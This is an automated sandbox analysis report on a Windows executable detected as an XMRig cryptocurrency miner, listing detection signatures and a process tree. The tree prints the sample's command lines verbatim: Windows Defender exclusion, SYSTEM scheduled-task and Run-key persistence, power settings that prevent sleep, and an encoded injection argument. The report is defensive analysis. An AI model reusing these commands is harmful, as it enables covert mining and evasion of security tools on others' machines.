Windows
Analysis Report
ahlntQUj2t.exe
Overview
General Information
| Field | Value |
|---|---|
| Sample name | ahlntQUj2t.exe (renamed because original name is a hash value) |
| Original sample name | 75a1567b2fdb22e1e074aed9cd5e759013ea59bf7b1ef8d7f32c524f32b680c9.exe |
| Analysis ID | 1548723 |
| MD5 | 934e9a3e294fa41c527fbd6dc867ddec |
| SHA1 | 57edab4c313a7b3bf083a0c3364195b0491e00ba |
| SHA256 | 75a1567b2fdb22e1e074aed9cd5e759013ea59bf7b1ef8d7f32c524f32b680c9 |
| Tags | exe, user-Chainskilabs |
| Infos | |
Detection
| Field | Value |
|---|---|
| Detection | Xmrig |
| Score | 100 |
| Range | 0 - 100 |
| Whitelisted | false |
| Confidence | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
DNS related to crypt mining pools
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Found strings related to Crypto-Mining
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Sample is not signed and drops a device driver
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses powercfg.exe to modify the power settings
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Contains functionality to call native functions
Contains functionality to detect virtual machines (STR)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the program root directory (C:\Program Files)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- ahlntQUj2t.exe (PID: 7704, cmdline: `"C:\Users\user\Desktop\ahlntQUj2t.exe"`, MD5: 934E9A3E294FA41C527FBD6DC867DDEC)
  - powershell.exe (PID: 7988, cmdline: `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ubqexh#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GQFENPEL' /tr '''C:\Program Files\xjfgcnhmcvxy.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\xjfgcnhmcvxy.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GQFENPEL' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GQFENPEL" /t REG_SZ /f /d 'C:\Program Files\xjfgcnhmcvxy.exe' }`, MD5: 04029E121A0CFA5991749937DD22A1D9)
  - conhost.exe (PID: 8004, cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1`, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 7716, cmdline: `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force`, MD5: 04029E121A0CFA5991749937DD22A1D9)
  - conhost.exe (PID: 7724, cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1`, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 7972, cmdline: `C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0`, MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  - conhost.exe (PID: 7980, cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1`, MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - powercfg.exe (PID: 8040, cmdline: `powercfg /x -hibernate-timeout-ac 0`, MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
  - powercfg.exe (PID: 8116, cmdline: `powercfg /x -hibernate-timeout-dc 0`, MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
  - powercfg.exe (PID: 8148, cmdline: `powercfg /x -standby-timeout-ac 0`, MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
  - powercfg.exe (PID: 8168, cmdline: `powercfg /x -standby-timeout-dc 0`, MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
- powershell.exe (PID: 7264, cmdline: `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydxtfs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GQFENPEL" } Else { "C:\Program Files\xjfgcnhmcvxy.exe" }`, MD5: 04029E121A0CFA5991749937DD22A1D9)
  - conhost.exe (PID: 7292, cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1`, MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - schtasks.exe (PID: 6752, cmdline: `"C:\Windows\system32\schtasks.exe" /run /tn GQFENPEL`, MD5: 76CD6626DD8834BD4A42E6A565104DC2)
- xjfgcnhmcvxy.exe (PID: 6384, cmdline: `"C:\Program Files\xjfgcnhmcvxy.exe"`, MD5: 934E9A3E294FA41C527FBD6DC867DDEC)
  - conhost.exe (PID: 2384, cmdline: `C:\Windows\System32\conhost.exe xcgkmjxjdowq`, MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - conhost.exe (PID: 8180, cmdline:
C:\Windows \System32\ conhost.ex e gzssiant htxzdggz 6 E3sjfZq2rJ QaxvLPmXgs BL6xjjYguH WtOpZ+stId vug8Rp3hia ni4Twfqfj5 pfOQ4C5/lI R+WrKX/39l FBfrYgVA5x lELaQrgfEY I/1+l+sm6d 1wY+jp8lQ+ gyInBZtRry f27JkgwVg8 +gc8zt/+Qw /FqR21gXGs iWp5M1/PaU O8B8L/yFa9 vhQOOMQzU9 osOZwr+lVW CnvU0S6ajO 3l3PA+IO3t Z+KIHzg9oJ DykmRT9FPo LVpg3f2E+S /d4wYAneGa TBaw9u+h7y SSQW4uLa2R drQlsNvaot hGQq4OkU9/ 7weTT4gwdl FYcJqzkf6C rPgHCU2Z2X /1LqnGA0Z/ oGM3RQZ3KF MH6aI6u72M x/Roo9xz5o go8pI2aMP1 z57eBCyYbX yiGT0rCG54 0iwNf53KRD w5r+qu9TX7 DnABrUnuCb tJtyaOErrf hHdH0mzc3o Hhwbzk+xXd FEnj5LezfN 80ibSpckaU WKu/Nc8n5n 3862TFcZoV 3+5pG7wnvA Ca9eswJk6I Y7ANEpRFN9 HJzRPurRT3 aTK7NgnMwc 4gmU= MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 7112, cmdline: `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force`, MD5: 04029E121A0CFA5991749937DD22A1D9)
  - conhost.exe (PID: 972, cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1`, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 1408, cmdline: `C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0`, MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  - conhost.exe (PID: 3792, cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1`, MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - powercfg.exe (PID: 7796, cmdline: `powercfg /x -hibernate-timeout-ac 0`, MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
  - powercfg.exe (PID: 7164, cmdline: `powercfg /x -hibernate-timeout-dc 0`, MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
  - powercfg.exe (PID: 2196, cmdline: `powercfg /x -standby-timeout-ac 0`, MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
  - powercfg.exe (PID: 7824, cmdline: `powercfg /x -standby-timeout-dc 0`, MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
- powershell.exe (PID: 7460, cmdline: `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ubqexh#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GQFENPEL' /tr '''C:\Program Files\xjfgcnhmcvxy.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\xjfgcnhmcvxy.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GQFENPEL' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GQFENPEL" /t REG_SZ /f /d 'C:\Program Files\xjfgcnhmcvxy.exe' }`, MD5: 04029E121A0CFA5991749937DD22A1D9)
  - conhost.exe (PID: 7696, cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1`, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 8136, cmdline: `C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"`, MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  - conhost.exe (PID: 2044, cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1`, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 1888, cmdline: `C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"`, MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  - conhost.exe (PID: 8132, cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1`, MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - WMIC.exe (PID: 4268, cmdline: `wmic PATH Win32_VideoController GET Name, VideoProcessor`, MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| xmrig | According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information. | No Attribution | | |
No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | |

| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | |
| | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | |
| | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | |
| | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | |
| | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | |

| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | |
| | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | |
| | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | |
| | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | |
| | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | |
System Summary

Source: | Author: Jonathan Cheong, oscd.community |